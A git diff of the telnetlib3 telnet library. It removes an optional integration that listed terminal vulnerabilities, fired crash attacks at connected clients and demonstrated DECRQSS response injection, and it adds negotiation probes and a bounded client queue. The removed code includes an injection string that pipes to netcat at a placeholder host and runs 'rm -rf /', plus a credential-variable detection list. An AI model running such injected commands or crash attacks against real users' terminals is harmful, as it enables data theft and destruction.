os.environ["TV_DETECT_TERMINAL"] = "1" + os.environ["TELNETLIB3_INTERACTIVE_TERMINAL"] = "1" else: - os.environ.pop("TV_DETECT_TERMINAL", None) + os.environ.pop("TELNETLIB3_INTERACTIVE_TERMINAL", None) post_script = FINGERPRINT_POST_SCRIPT or "telnetlib3.fingerprinting_display" - exit_code = await pty_shell( + await pty_shell( reader, writer, sys.executable, @@ -1657,11 +1251,6 @@ async def _handle_telnet_attack(_writer: TelnetWriterUnicode, attack_key: str) - raw_mode=True, ) - # Exit code 100+ signals a telnet-layer attack request - if exit_code is not None and exit_code >= 100: - attack_key = str(exit_code - 100) - await _handle_telnet_attack(writer, attack_key) - writer.close() else: writer.close() @@ -1709,22 +1298,11 @@ def fingerprint_server_main() -> None: def _add_extra_args(parser: argparse.ArgumentParser) -> None: parser.add_argument("--data-dir", default=DATA_DIR, help="directory for fingerprint data") - parser.add_argument( - "--passkey", - default="", - help="passkey for tv-detect vulnerability access (KEY=VALUE format)", - ) args = parse_server_args(extra_args_fn=_add_extra_args) DATA_DIR = args.pop("data_dir") os.environ["TELNETLIB3_DATA_DIR"] = DATA_DIR - passkey = args.pop("passkey", "") or os.environ.get("TV_DETECT_PASSKEY", "") - if passkey: - from . import fingerprinting_display # noqa: PLC0415 - - fingerprinting_display._tv_passkey = passkey - if args["shell"] is _config.shell: args["shell"] = fingerprinting_server_shell args["protocol_factory"] = FingerprintingServer diff --git a/telnetlib3/fingerprinting_display.py b/telnetlib3/fingerprinting_display.py index 788a78af..9f64e0c2 100644 --- a/telnetlib3/fingerprinting_display.py +++ b/telnetlib3/fingerprinting_display.py @@ -16,7 +16,6 @@ import termios import tempfile import textwrap -import warnings import functools import contextlib import subprocess @@ -26,27 +25,6 @@ import blessed import prettytable -# third-party (optional) -try: - from tv_detect.attacks import PASSKEY as _TV_PASSKEY - from tv_detect.attacks import SEVERITY_COLOR - from tv_detect.attacks import DECRQSS_INJECT_MARKER as _DECRQSS_INJECT_MARKER - from tv_detect.execute import prompt_keys as _tv_prompt_keys - from tv_detect.execute import execute_attack as _tv_execute_attack - from tv_detect.execute import verify_passkey as _tv_verify_passkey - from tv_detect.execute import try_decrqss_injection - from tv_detect.execute import get_vulnerability_rows as _tv_vuln_rows - from tv_detect.execute import get_attacks_for_software as _tv_get_attacks - - _HAS_TV_DETECT = True -except ImportError: - _HAS_TV_DETECT = False - _TV_PASSKEY = "" - -#: Active passkey for tv-detect vulnerability gating. -#: Set from client NEW-ENVIRON, REPL input, or ``--passkey`` CLI argument. -_tv_passkey: str = "" - # local from ._paths import _atomic_json_write # noqa: E402 from .accessories import PATIENCE_MESSAGES # noqa: E402 @@ -115,14 +93,14 @@ def _log_identification(data: Dict[str, Any], names: Dict[str, str]) -> None: def _syslog_info(msg: str) -> None: - """Write an INFO-level message to syslog with tv-detect-telnet ident.""" + """Write an INFO-level message to syslog with telnetlib3-fingerprint ident.""" import syslog import inspect frame = inspect.currentframe() caller = frame.f_back if frame else None lineno = caller.f_lineno if caller else 0 - syslog.openlog("tv-detect-telnet", syslog.LOG_PID) + syslog.openlog("telnetlib3-fingerprint", syslog.LOG_PID) syslog.syslog(syslog.LOG_INFO, f"INFO fingerprinting_display.py:{lineno} {msg}") @@ -156,7 +134,7 @@ def _styled_input(term: "blessed.Terminal", prompt: str) -> str: _flush_input(term) # MUD clients: simple line input, no cursor tricks - if os.environ.get("TV_DETECT_TERMINAL") != "1": + if os.environ.get("TELNETLIB3_INTERACTIVE_TERMINAL") != "1": echo(prompt) return _read_line(term).strip() @@ -228,7 +206,7 @@ def _run_ucs_detect() -> Optional[Dict[str, Any]]: "TERMINFO_DIRS", ) env = {k: os.environ[k] for k in _PASSTHROUGH_KEYS if k in os.environ} - env["UCS_DETECT_SYSLOG"] = "tv-detect-telnet" + env["UCS_DETECT_SYSLOG"] = "telnetlib3-fingerprint" try: try: @@ -628,101 +606,6 @@ def _build_telnet_rows(term: "blessed.Terminal", data: Dict[str, Any]) -> List[T return pairs -#: Credential / secret env vars -- immediate red flag if leaked over telnet. -_CRITICAL_ENV_VARS = frozenset( - { - # AWS credentials - "AWS_ACCESS_KEY_ID", - "AWS_SECRET_ACCESS_KEY", - "AWS_SESSION_TOKEN", - # SSH network topology -- reveals internal IPs / jump-host identity - "SSH_REMOTE_HOST", - "SSH_REMOTE_IP", - # API keys / tokens - "GITHUB_TOKEN", - "GH_TOKEN", - "GITLAB_TOKEN", - "GL_TOKEN", - "ANTHROPIC_API_KEY", - "OPENAI_API_KEY", - "STRIPE_SECRET_KEY", - "SENDGRID_API_KEY", - "HEROKU_API_KEY", - "NPM_TOKEN", - "SLACK_TOKEN", - "TWILIO_AUTH_TOKEN", - # Database credentials - "DATABASE_URL", - "PGPASSWORD", - "MYSQL_PWD", - "REDIS_URL", - # Azure / GCP - "AZURE_CLIENT_SECRET", - "GOOGLE_APPLICATION_CREDENTIALS", - # Generic secret patterns - "SECRET_KEY", - "API_KEY", - "PRIVATE_KEY", - "JWT_SECRET", - # Docker credentials - "DOCKER_PASSWORD", - } -) - -#: Vars that are useful for a telnet session -- everything else is oversharing. -_USEFUL_ENV_VARS = frozenset( - { - "TERM", - "TERM_PROGRAM", - "TERM_PROGRAM_VERSION", - "COLUMNS", - "LINES", - "COLORTERM", - "LANG", - "LC_ALL", - "LC_CTYPE", - "DISPLAY", - "USER", - "LOGNAME", - "EDITOR", - "VISUAL", - "IPADDRESS", - # MUD client MTTS/MNES capabilities (desirable to share) - "256_COLORS", - "ANSI", - "CHARSET", - "CLIENT_NAME", - "CLIENT_VERSION", - "MTTS", - "OSC_COLOR_PALETTE", - "OSC_HYPERLINKS", - "OSC_HYPERLINKS_MENU", - "OSC_HYPERLINKS_PROMPT", - "OSC_HYPERLINKS_SEND", - "OSC_HYPERLINKS_STYLE_BASIC", - "OSC_HYPERLINKS_STYLE_STATES", - "OSC_HYPERLINKS_TOOLTIP", - "SCREEN_READER", - "TERMINAL_TYPE", - "TLS", - "TRUECOLOR", - "UTF-8", - "VT100", - "WORD_WRAP", - } -) - - -def _osc8(url: str, text: str) -> str: - """Format an OSC 8 terminal hyperlink.""" - return f"\x1b]8;;{url}\x1b\\{text}\x1b]8;;\x1b\\" - - -_CVE_2005_0488_URL = "https://nvd.nist.gov/vuln/detail/CVE-2005-0488" -_CVE_2005_1205_URL = "https://nvd.nist.gov/vuln/detail/CVE-2005-1205" -_DECRQCRA_REF_URL = "https://dgl.cx/2023/09/ansi-terminal-security" - - def _extract_software_name(data: Dict[str, Any]) -> str: """ Extract terminal software name from fingerprint data. @@ -739,151 +622,11 @@ def _extract_software_name(data: Dict[str, Any]) -> str: return extra.get("TERM") or "" -def _extract_passkey(data: Dict[str, Any]) -> str: - """ - Extract passkey from client NEW-ENVIRON data. - - Checks the env var from the telnet session's extra info - against the tv-detect passkey format. - - :returns: Passkey string in ``KEY=VALUE`` format, or empty string. - """ - if not _HAS_TV_DETECT: - return "" - telnet_probe = data.get("telnet-probe", {}) - extra = telnet_probe.get("session_data", {}).get("extra", {}) - envvar, _, expected = _TV_PASSKEY.partition("=") - value = extra.get(envvar, "") - if value == expected: - return str(_TV_PASSKEY) - return "" - - -def _build_vulnerabilities_rows( - term: "blessed.Terminal", data: Dict[str, Any] -) -> List[Tuple[str, str]]: - """ - Build (key, value) tuples for the vulnerabilities table. - - Only vulnerabilities that are actually detected are shown. CVE identifiers are on the left, - descriptions with the affected protocol/sequence in parentheses on the right. - """ - high: List[Tuple[str, str]] = [] - medium: List[Tuple[str, str]] = [] - low: List[Tuple[str, str]] = [] - - _high = term.bold_firebrick1 - _med = term.darkorange - _low = term.yellowgreen - - # -- HIGH -- - - # DECRQSS injection - injection = data.get("injection_probe") - if injection and injection.get("injectable"): - ref = _osc8(_DECRQCRA_REF_URL, "Leadbeater 2023") - high.append((ref, f"{_high('[HIGH]')} {_high('Response injection (DECRQSS)')}")) - - # Terminal-specific vulnerabilities from tv-detect - if _HAS_TV_DETECT: - sw_name = _extract_software_name(data) - _sev_fn = {"HIGH": _high, "MEDIUM": _med, "LOW": _low} - for ref, sev, name in _tv_vuln_rows(sw_name, passkey=_tv_passkey): - fn = _sev_fn.get(sev, _low) - bucket = {"HIGH": high, "MEDIUM": medium, "LOW": low}.get(sev, low) - bucket.append((ref, f"{fn(f'[{sev}]')} {fn(name)}")) - - # -- MEDIUM -- - - # NEW_ENVIRON oversharing - telnet_probe = data.get("telnet-probe", {}) - session_data = telnet_probe.get("session_data", {}) - extra = session_data.get("extra", {}) - env_keys = [k for k in extra if k == k.upper() and extra[k]] - critical = sorted(k for k in env_keys if k in _CRITICAL_ENV_VARS) - overshared = sorted( - k for k in env_keys if k not in _CRITICAL_ENV_VARS and k not in _USEFUL_ENV_VARS - ) - cve_refs = ( - _osc8(_CVE_2005_0488_URL, "CVE-2005-0488") - + ", " - + _osc8(_CVE_2005_1205_URL, "CVE-2005-1205") - ) - if critical: - high.append( - ( - cve_refs, - f"{_high('[HIGH]')} {_high('LEAKED: ' + ', '.join(critical) + ' (NEW_ENVIRON)')}", - ) - ) - if overshared: - low.append( - ( - cve_refs if not critical else "", - f"{_low('[LOW]')} " - f"{_low('Oversharing: ' + ', '.join(overshared) + ' (NEW_ENVIRON)')}", - ) - ) - - # CVE probes from vt-houdini - cve_results = data.get("cve_results") - if not cve_results: - terminal_probe = data.get("terminal-probe", {}) - cve_results = ( - terminal_probe.get("session_data", {}) - .get("terminal_results", {}) - .get("cve_results", {}) - ) - for cve_id, result in sorted(cve_results.items()): - if result and result is not False: - url = f"https://nvd.nist.gov/vuln/detail/{cve_id}" - label = _osc8(url, cve_id) - medium.append((label, f"{_med('[MEDIUM]')} {_med('Vulnerable')}")) - - # -- LOW (screen scraping) -- - - sts_probe = data.get("sts_probe") - scrape = data.get("screen-scrape") - if sts_probe and sts_probe.get("sts"): - ref = _osc8(_DECRQCRA_REF_URL, "Leadbeater 2023") - if scrape and scrape.get("method") == "sts": - low.append((ref, f"{_low('[LOW]')} {_low('Screen scraping (STS)')}")) - else: - low.append((ref, f"{_low('[LOW]')} {_low('Screen scraping (STS) supported')}")) - - decrqcra_probe = data.get("decrqcra_probe") - if not decrqcra_probe and scrape: - decrqcra_probe = scrape - if decrqcra_probe: - ref = ( - _osc8(_DECRQCRA_REF_URL, "Leadbeater 2023") - if not (sts_probe and sts_probe.get("sts")) - else "" - ) - if decrqcra_probe.get("decrqcra"): - if scrape and (scrape.get("screen_0") or scrape.get("screen_1")): - low.append((ref, f"{_low('[LOW]')} {_low('Screen scraping (DECRQCRA)')}")) - else: - low.append((ref, f"{_low('[LOW]')} {_low('Screen scraping (DECRQCRA) supported')}")) - elif scrape and scrape.get("method") != "sts" and "decrqcra" not in (scrape or {}): - low.append((ref, f"{_low('[LOW]')} {_low('Screen scraping (DECRQCRA) supported')}")) - - return high + medium + low - - def _make_terminal(**kwargs: Any) -> "blessed.Terminal": - """Create a blessed Terminal, falling back to ``ansi`` on setupterm failure.""" + """Create a blessed Terminal.""" from blessed import Terminal - with warnings.catch_warnings(record=True) as caught: - warnings.simplefilter("always") - term = Terminal(**kwargs) - if any("setupterm" in str(w.message) for w in caught): - kwargs["kind"] = "ansi" - with warnings.catch_warnings(): - warnings.simplefilter("ignore") - term = Terminal(**kwargs) - return term + return Terminal(**kwargs) @contextlib.contextmanager @@ -1022,14 +765,6 @@ def make_table(title: str, pairs: List[Tuple[str, str]]) -> str: if telnet_rows: table_strings.append(make_table("Telnet", telnet_rows)) - vuln_rows = _build_vulnerabilities_rows(term, data) - if vuln_rows: - vuln_count = len(vuln_rows) - vuln_title = "Vulnerabilities" - if vuln_count: - vuln_title += f" ({vuln_count})" - table_strings.append(make_table(vuln_title, vuln_rows)) - if not table_strings: return False @@ -1311,7 +1046,7 @@ def _color_name(name: str) -> str: if username: title = f"{username} - {title}" # Only set xterm title for real terminal emulators, not MUD clients. - if os.environ.get("TV_DETECT_TERMINAL") == "1": + if os.environ.get("TELNETLIB3_INTERACTIVE_TERMINAL") == "1": echo(f"\x1b]0;{title}\x1b\\") if lines: @@ -1371,15 +1106,8 @@ def _repl_prompt(term: "blessed.Terminal", software_name: str = "") -> None: lines = [ f"{bk(term, 't')}ERM or TE{bk(term, 'l')}NET details?", # codespell:ignore te f"{bk(term, 's')}ummarize, {bk(term, 'u')}pdate, or s{bk(term, 'h')}ow DB", + f"{bk(term, 'q')}uit", ] - if _HAS_TV_DETECT: - pk = _tv_prompt_keys(software_name=software_name, passkey=_tv_passkey) - if pk["available"]: - lines.append(f"{bk(term, 'v')}ulnerabilities, {bk(term, 'q')}uit") - else: - lines.append(f"{bk(term, 'q')}uit") - else: - lines.append(f"{bk(term, 'q')}uit") legend = "\r\n".join(lines) echo(f"\r{term.clear_eos}{term.normal}{legend}\r\n: ") @@ -1409,10 +1137,6 @@ def _read_line(term: "blessed.Terminal") -> str: echo(ch) -if not _HAS_TV_DETECT: - _DECRQSS_INJECT_MARKER = "id | nc example.com 919;rm -rf /" # noqa: F811 - - def _paginate(term: "blessed.Terminal", text: str, **_kw: Any) -> None: """Display text.""" for line in text.split("\n"): @@ -1559,90 +1283,6 @@ def _filter_telnet_detail(detail: Optional[Dict[str, Any]]) -> Optional[Dict[str return result -def _vuln_menu(term: "blessed.Terminal", software_name: str = "") -> Optional[str]: - """ - Show vulnerability attack menu, using tv-detect. - - When the terminal is a known target, show only matching attacks. When unknown, show all attacks - so the user can try any of them. - """ - if not _HAS_TV_DETECT: - return None - echo = functools.partial(print, end="", flush=True) - available = _tv_get_attacks("", passkey=_tv_passkey) - if not available: - echo(f"\r\n{term.bold('No attacks available for this terminal.')}\r\n") - return None - from tv_detect.attacks import VULN_WARNING, PRICING_MESSAGE - - echo(f"\r\n{term.bold_gold1(VULN_WARNING)}\r\n\r\n") - authorized = _tv_verify_passkey(_tv_passkey) - max_sev = max(len(v["severity"]) for v in available.values()) - max_id = max(len(k) for k in available) - for key in sorted(available, key=int): - attack = available[key] - sev = attack["severity"] - color_fn = getattr(term, SEVERITY_COLOR.get(sev, "normal")) - sev_str = color_fn(f"[{sev:^{max_sev}}]") - id_str = key.rjust(max_id) - target = attack.get("target", "") - target_str = f" ({target})" if target else "" - if attack.get("passkey_limited") and not authorized: - echo( - f" ({term.bold(id_str)}) {sev_str}" - f" {term.bold_gold1(PRICING_MESSAGE)}{target_str}\r\n" - ) - else: - echo(f" ({term.bold(id_str)}) {sev_str} {attack['name']}{target_str}\r\n") - echo("\r\n: ") - key = _read_line(term).strip() - if key in available: - return key - return None - - -def _execute_crash( - term: "blessed.Terminal", key: str, software_name: str = "", ip: str = "unknown" -) -> None: - """Execute a vulnerability attack by key, delegating to tv-detect.""" - if not _HAS_TV_DETECT: - return - echo = functools.partial(print, end="", flush=True) - client_label = f"Client {ip} {repr(software_name)}" if software_name else f"Client {ip}" - available = _tv_get_attacks("", passkey=_tv_passkey) - attack = available.get(key, {}) - handler = attack.get("handler", "") - - # Telnet-layer attacks can't be executed from the PTY subprocess. - # Exit with a special code so the server handles it after pty_shell. - if handler == "telnet_new_environ_user": - _syslog_info(f"{client_label} selects VULN-#{key} (telnet-layer)") - name = attack.get("name", "unknown") - echo(f"\r\n{term.bold_firebrick1('Crash')}: {name}{term.clear_eol}\r\n") - if note := attack.get("note"): - echo(f" {term.bold_black(note)}{term.clear_eol}\r\n") - echo(f"{term.bold('Sending...')}{term.clear_eol}\r\n") - if key.isdigit() and 1 <= int(key) <= 99: - sys.exit(100 + int(key)) - return - - result = _tv_execute_attack(key, software_name="", passkey=_tv_passkey) - if result.get("executed"): - _syslog_info(f"{client_label} selects VULN-#{key} (permitted)") - # Only reset screen for raw sequence payloads that may move the cursor; - # handler-based attacks (ZMODEM, kitty, etc) manage their own output. - if not attack.get("handler"): - echo(f"{term.home}{term.clear_eos}") - name = result.get("attack_name", "unknown") - echo(f"\r\n{term.bold_firebrick1('Crash')}: {name}{term.clear_eol}\r\n") - if note := result.get("note"): - echo(f" {term.bold_black(note)}{term.clear_eol}\r\n") - echo(f"{term.bold('Sent.')} The client may have crashed.{term.clear_eol}\r\n") - elif error := result.get("error"): - _syslog_info(f"{client_label} selects VULN-#{key} (denied)") - echo(f"\r\n{term.bold_gold1(error)}\r\n") - - def _show_detail(term: "blessed.Terminal", data: Dict[str, Any], section: str) -> None: """Show detailed JSON for a fingerprint section with pagination.""" if section == "terminal": @@ -1773,16 +1413,9 @@ def _fingerprint_repl( names: Optional[Dict[str, str]] = None, ) -> None: """Interactive REPL for exploring fingerprint data.""" - global _tv_passkey ip = _client_ip(data) software_name = _extract_software_name(data) - # Check for passkey from client NEW-ENVIRON - if _HAS_TV_DETECT and not _tv_passkey: - env_passkey = _extract_passkey(data) - if env_passkey: - _tv_passkey = env_passkey - _commands = { "q": "logoff", "t": "terminal-detail", @@ -1792,53 +1425,17 @@ def _fingerprint_repl( "h": "database", "\x0c": "refresh", } - if _HAS_TV_DETECT: - _commands["v"] = "vulnerabilities" db_cache = None - decrqss_tried = False - - # Check if CVE-2008-2383 was previously detected as vulnerable - cve_results = data.get("cve_results", {}) - decrqss_vulnerable = bool(cve_results.get("CVE-2008-2383")) while True: _repl_prompt(term, software_name=software_name) while term.inkey(timeout=0): pass - if _HAS_TV_DETECT and decrqss_vulnerable and not decrqss_tried: - decrqss_tried = True - if try_decrqss_injection(): - echo( - f"{term.bold_red}{_DECRQSS_INJECT_MARKER}{term.normal}\r\n" - f"{term.bold_red}^^ injected via CVE-2008-2383 DECRQSS" - f" echoback{term.normal}\r\n\r\n" - ) - logger.info("%s: DECRQSS injection demonstrated", ip) - import select - - while select.select([sys.stdin.fileno()], [], [], 0.2)[0]: - os.read(sys.stdin.fileno(), 4096) - while term.inkey(timeout=0): - pass - continue - raw_input = _read_line(term).strip() cmd = raw_input.lower() - # Accept passkey entry: "passkey=USER=jEffREYtAblES" - if _HAS_TV_DETECT and raw_input.lower().startswith("passkey="): - candidate = raw_input[len("passkey=") :] - if _tv_verify_passkey(candidate): - _tv_passkey = candidate - logger.info("%s: passkey accepted", ip) - echo(f"\r\n{term.bold_green('Passkey accepted.')}\r\n") - else: - logger.info("%s: passkey rejected", ip) - echo(f"\r\n{term.bold_red('Invalid passkey.')}\r\n") - continue - if not cmd: echo("\r: ") continue @@ -1871,10 +1468,6 @@ def _fingerprint_repl( _prompt_fingerprint_identification(term, data, filepath, _names) names = _load_fingerprint_names() seen_counts = _build_seen_counts(data, names, term) - elif cmd == "v" and _HAS_TV_DETECT: - choice = _vuln_menu(term, software_name=software_name) - if choice: - _execute_crash(term, choice, software_name=software_name, ip=ip) elif cmd == "\x0c": echo(term.normal + term.clear) _display_compact_summary(data, term) @@ -1973,7 +1566,9 @@ def _probe_terminal(filepath: str, data: Dict[str, Any]) -> Optional[str]: :returns: Updated filepath (may change if terminal hash moves it). """ - term = _make_terminal() + from blessed._capabilities import TermcapResponse + + term = _make_terminal(_xtgettcap_data=TermcapResponse(supported=False)) flushed = term.flushinp() if flushed and flushed.strip(): _syslog_info(f"pre-probe flushed {len(flushed)} bytes: {repr(flushed)}") @@ -1981,7 +1576,7 @@ def _probe_terminal(filepath: str, data: Dict[str, Any]) -> Optional[str]: _atomic_json_write(filepath, data) # Skip terminal probing for MUD/line-mode clients - if os.environ.get("TV_DETECT_TERMINAL") != "1": + if os.environ.get("TELNETLIB3_INTERACTIVE_TERMINAL") != "1": return filepath if "screen-scrape" not in data: @@ -2031,20 +1626,18 @@ def _process_client_fingerprint(filepath: str, data: Dict[str, Any]) -> None: _setup_term_environ(data) - # Extract passkey from client NEW-ENVIRON if not already set - global _tv_passkey - if _HAS_TV_DETECT and not _tv_passkey: - env_passkey = _extract_passkey(data) - if env_passkey: - _tv_passkey = env_passkey - try: import blessed # noqa: F401 except ImportError: print(json.dumps(data, indent=2, sort_keys=True)) return - term = _make_terminal() + kwargs: Dict[str, Any] = {} + if os.environ.get("TELNETLIB3_INTERACTIVE_TERMINAL") != "1": + from blessed._capabilities import TermcapResponse + + kwargs["_xtgettcap_data"] = TermcapResponse(supported=False) + term = _make_terminal(**kwargs) names = _load_fingerprint_names() seen_counts = _build_seen_counts(data, names, term) diff --git a/telnetlib3/server.py b/telnetlib3/server.py index 9df6e120..a722e349 100755 --- a/telnetlib3/server.py +++ b/telnetlib3/server.py @@ -919,6 +919,24 @@ def _negotiate_echo(self) -> None: self._echo_negotiated = True +def _enqueue_client(server: "Server", protocol: server_base.BaseServer) -> None: + """ + Push a completed protocol onto the server's client queue. + + Discards the oldest entry when the bounded queue is full so that + long-running servers (which may never call + :meth:`Server.wait_for_client`) do not accumulate unbounded memory. + """ + try: + server._new_client.put_nowait(protocol) + except asyncio.QueueFull: + try: + server._new_client.get_nowait() + except asyncio.QueueEmpty: + pass + server._new_client.put_nowait(protocol) + + class Server: """ Telnet server that tracks connected clients. @@ -931,7 +949,10 @@ def __init__(self, server: Optional[asyncio.Server]) -> None: """Initialize wrapper around asyncio.Server.""" self._server: Optional[asyncio.Server] = server self._protocols: List[server_base.BaseServer] = [] - self._new_client: asyncio.Queue[server_base.BaseServer] = asyncio.Queue() + # Bounded queue prevents unbounded memory growth on long-running + # servers where wait_for_client() is never called. The capacity + # (1000) is far beyond any realistic wait_for_client() drain rate. + self._new_client: asyncio.Queue[server_base.BaseServer] = asyncio.Queue(maxsize=1000) def close(self) -> None: """Close the server, stop accepting new connections, and close all clients.""" @@ -985,12 +1006,13 @@ async def wait_for_client(self) -> server_base.BaseServer: def _register_protocol(self, protocol: asyncio.Protocol) -> None: """Register a new protocol instance (called by factory).""" + # Prune dead protocols to prevent unbounded memory growth on + # long-running servers handling many short-lived connections. + self._protocols = [p for p in self._protocols if not getattr(p, "_closing", False)] self._protocols.append(protocol) # type: ignore[arg-type] - # Only register callbacks if protocol has the required waiters - # (custom protocols like plain asyncio.Protocol won't have these) if hasattr(protocol, "_waiter_connected"): protocol._waiter_connected.add_done_callback( - lambda f, p=protocol: self._new_client.put_nowait(p) if not f.cancelled() else None + lambda f, p=protocol: _enqueue_client(self, p) if not f.cancelled() else None ) diff --git a/telnetlib3/server_fingerprinting.py b/telnetlib3/server_fingerprinting.py index 003f6705..da401252 100644 --- a/telnetlib3/server_fingerprinting.py +++ b/telnetlib3/server_fingerprinting.py @@ -33,9 +33,13 @@ from . import fingerprinting as _fps from ._paths import _atomic_json_write from .telopt import ( + DO, + IAC, VAR, + ECHO, MSSP, NAWS, + WILL, LFLOW, TTYPE, VALUE, @@ -67,6 +71,12 @@ # in ``server_requested`` (what the server sent DO for). _CLIENT_ONLY_WILL = frozenset({TTYPE, TSPEED, NAWS, XDISPLOC, NEW_ENVIRON, LFLOW, LINEMODE, SNDLOC}) +# Options probed in the wrong direction to detect role-unaware servers. +# A server should never WILL these (they describe client-side properties). +_WRONG_DIRECTION_DO = frozenset({NAWS, TTYPE}) +# A server should never DO these (they describe server-side behaviour). +_WRONG_DIRECTION_WILL = frozenset({ECHO}) + _BANNER_MAX_BYTES = 65536 _NEGOTIATION_SETTLE = 0.5 _BANNER_WAIT = 3.0 @@ -591,11 +601,17 @@ async def _fingerprint_session( if writer.is_closing(): probe_results: dict[str, Any] = {} probe_time = 0.0 + wrong_dir_results: dict[str, str] = {} + looped_options: list[str] = [] else: probe_time = time.time() probe_results = await probe_server_capabilities( writer, scan_type=scan_type, timeout=_PROBE_TIMEOUT ) + wrong_dir_results = await probe_server_wrong_direction(writer, timeout=_PROBE_TIMEOUT) + looped_options = await probe_server_loop_detection( + writer, probe_results, timeout=_PROBE_TIMEOUT + ) probe_time = time.time() - probe_time # 5b. If server acknowledged MSSP but data hasn't arrived yet, wait. @@ -625,7 +641,13 @@ async def _fingerprint_session( } # 7. Compute fingerprint once for save/name/display - protocol_fp = _create_server_protocol_fingerprint(writer, probe_results, scan_type=scan_type) + protocol_fp = _create_server_protocol_fingerprint( + writer, + probe_results, + scan_type=scan_type, + wrong_dir_results=wrong_dir_results, + looped_options=looped_options, + ) protocol_hash = _hash_fingerprint(protocol_fp) # 8. Save @@ -665,10 +687,130 @@ async def _fingerprint_session( writer.close() +async def probe_server_wrong_direction( + writer: TelnetWriter, timeout: float = _PROBE_TIMEOUT +) -> dict[str, str]: + """ + Probe a server with wrong-direction requests to detect role-unaware implementations. + + Sends ``IAC DO`` for client-only options (NAWS, TTYPE) -- a proper server + should refuse these with WONT. Sends ``IAC WILL`` for server-only options + (ECHO) -- a proper server should refuse these with DONT. + + Temporarily sets ``writer._server = True`` so telnetlib3's own directional + checks do not refuse the wrong-direction replies before we can observe them. + + :returns: Dict mapping option name to ``"wrong-accept"`` or ``"correct-refuse"``. + """ + results: dict[str, str] = {} + saved_server = writer._server + writer._server = True + + try: + # Send probes via _write to bypass iac() guards (which skip + # already-negotiated options). + for opt in _WRONG_DIRECTION_DO: + writer._write(IAC + DO + opt, escape_iac=False) + for opt in _WRONG_DIRECTION_WILL: + writer._write(IAC + WILL + opt, escape_iac=False) + + # Wait for responses to arrive and be processed by the protocol engine + loop = asyncio.get_running_loop() + deadline = loop.time() + timeout + while loop.time() < deadline: + all_done = all( + writer.remote_option.get(opt) is not None for opt in _WRONG_DIRECTION_DO + ) and all(writer.local_option.get(opt) is not None for opt in _WRONG_DIRECTION_WILL) + if all_done: + break + await asyncio.sleep(0.05) + + for opt in _WRONG_DIRECTION_DO: + name = _opt_byte_to_name(opt) + if writer.remote_option.enabled(opt): + results[name] = "wrong-accept" + else: + results[name] = "correct-refuse" + + for opt in _WRONG_DIRECTION_WILL: + name = _opt_byte_to_name(opt) + if writer.local_option.enabled(opt): + results[name] = "wrong-accept" + else: + results[name] = "correct-refuse" + + finally: + writer._server = saved_server + + return results + + +async def probe_server_loop_detection( + writer: TelnetWriter, probe_results: dict[str, _fps.ProbeResult], timeout: float = 0.3 +) -> list[str]: + """ + Detect servers that would re-negotiate already-agreed options (telnet loop). + + Saves the negotiation state for options the server already agreed to, + clears the cache, re-sends IAC DO / IAC WILL for those options, and + checks whether the server replies again. A well-behaved server ignores + redundant requests in the YES state; a loop-prone server replies again. + + Checks both directions: re-DO'ing options the server already WILL'd, + and re-WILL'ing options the server already DO'd. + + :returns: Sorted list of option names that would loop. + """ + looped: set[str] = set() + + for _label, opt_dict, probe_cmd, _reply_cmd in ( + ("remote", writer.remote_option, DO, WILL), + ("local", writer.local_option, WILL, DO), + ): + agreed: dict[bytes, bool] = {} + for opt, enabled in opt_dict.items(): + if enabled: + agreed[opt] = True + if not agreed: + continue + + saved: dict[bytes, bool | None] = {} + for opt in agreed: + saved[opt] = opt_dict.get(opt) + opt_dict[opt] = None # type: ignore[assignment] + writer.pending_option.pop(probe_cmd + opt, None) + + try: + writer._in_loop_detection = True + for opt in agreed: + writer.iac(probe_cmd, opt) + + loop = asyncio.get_running_loop() + deadline = loop.time() + timeout + while loop.time() < deadline: + all_settled = all(opt_dict.get(opt) is not None for opt in agreed) + if all_settled: + break + await asyncio.sleep(0.05) + + for opt in agreed: + if opt_dict.get(opt) is not None: + looped.add(_opt_byte_to_name(opt)) + + finally: + writer._in_loop_detection = False + for opt, value in saved.items(): + opt_dict[opt] = value # type: ignore[assignment] + for opt in agreed: + writer.pending_option.pop(probe_cmd + opt, None) + + return sorted(looped) + + async def probe_server_capabilities( writer: TelnetWriter, options: list[tuple[bytes, str, str]] | None = None, - timeout: float = 0.5, + timeout: float = _PROBE_TIMEOUT, scan_type: str = "quick", ) -> dict[str, _fps.ProbeResult]: """ @@ -770,6 +912,9 @@ def _collect_server_option_states(writer: TelnetWriter) -> dict[str, dict[str, A result: dict[str, Any] = { "server_offered": server_offered, "server_requested": server_requested, + "directional_refusals": sorted( + _opt_byte_to_name(opt) for opt in writer.directional_refusals + ), } if writer.environ_send_raw is not None: @@ -779,7 +924,11 @@ def _collect_server_option_states(writer: TelnetWriter) -> dict[str, dict[str, A def _create_server_protocol_fingerprint( - writer: TelnetWriter, probe_results: dict[str, _fps.ProbeResult], scan_type: str = "quick" + writer: TelnetWriter, + probe_results: dict[str, _fps.ProbeResult], + scan_type: str = "quick", + wrong_dir_results: dict[str, str] | None = None, + looped_options: list[str] | None = None, ) -> dict[str, Any]: """ Create anonymized protocol fingerprint for a remote server. @@ -798,12 +947,21 @@ def _create_server_protocol_fingerprint( _opt_byte_to_name(opt) for opt, enabled in writer.local_option.items() if enabled ) + wrong_dir_offered = sorted( + name for name, status in (wrong_dir_results or {}).items() if status == "wrong-accept" + ) + return { "probed-protocol": "server", "scan-type": scan_type, "offered-options": offered, "requested-options": requested, "refused-options": refused, + "wrong-direction-offered": wrong_dir_offered, + "directional-refusals": sorted( + _opt_byte_to_name(opt) for opt in writer.directional_refusals + ), + "looped-negotiation": looped_options or [], } diff --git a/telnetlib3/stream_writer.py b/telnetlib3/stream_writer.py index e665c84e..4b0f7492 100644 --- a/telnetlib3/stream_writer.py +++ b/telnetlib3/stream_writer.py @@ -266,6 +266,10 @@ def __init__( #: that were rejected with WONT (unsupported options). self.rejected_do: set[bytes] = set() + #: Set of option byte(s) refused due to directional mismatch + #: (e.g. WILL NAWS on client end, DO TTYPE on server end). + self.directional_refusals: set[bytes] = set() + #: Raw bytes of the last NEW_ENVIRON SEND payload, captured #: for fingerprinting. ``None`` if no SEND was received. self.environ_send_raw: Optional[bytes] = None @@ -320,6 +324,11 @@ def __init__( #: Whether MCCP3 compression is currently active (client→server). self.mccp3_active: bool = False + #: Set True during loop-detection probing so that the "assuming + #: NAWS-enabled" fallback in :meth:`_handle_sb_naws` does not + #: produce false-positive re-negotiation signals. + self._in_loop_detection: bool = False + #: Sub-negotiation buffer self._sb_buffer: collections.deque[bytes] = collections.deque() @@ -1909,6 +1918,7 @@ def handle_do(self, opt: bytes) -> 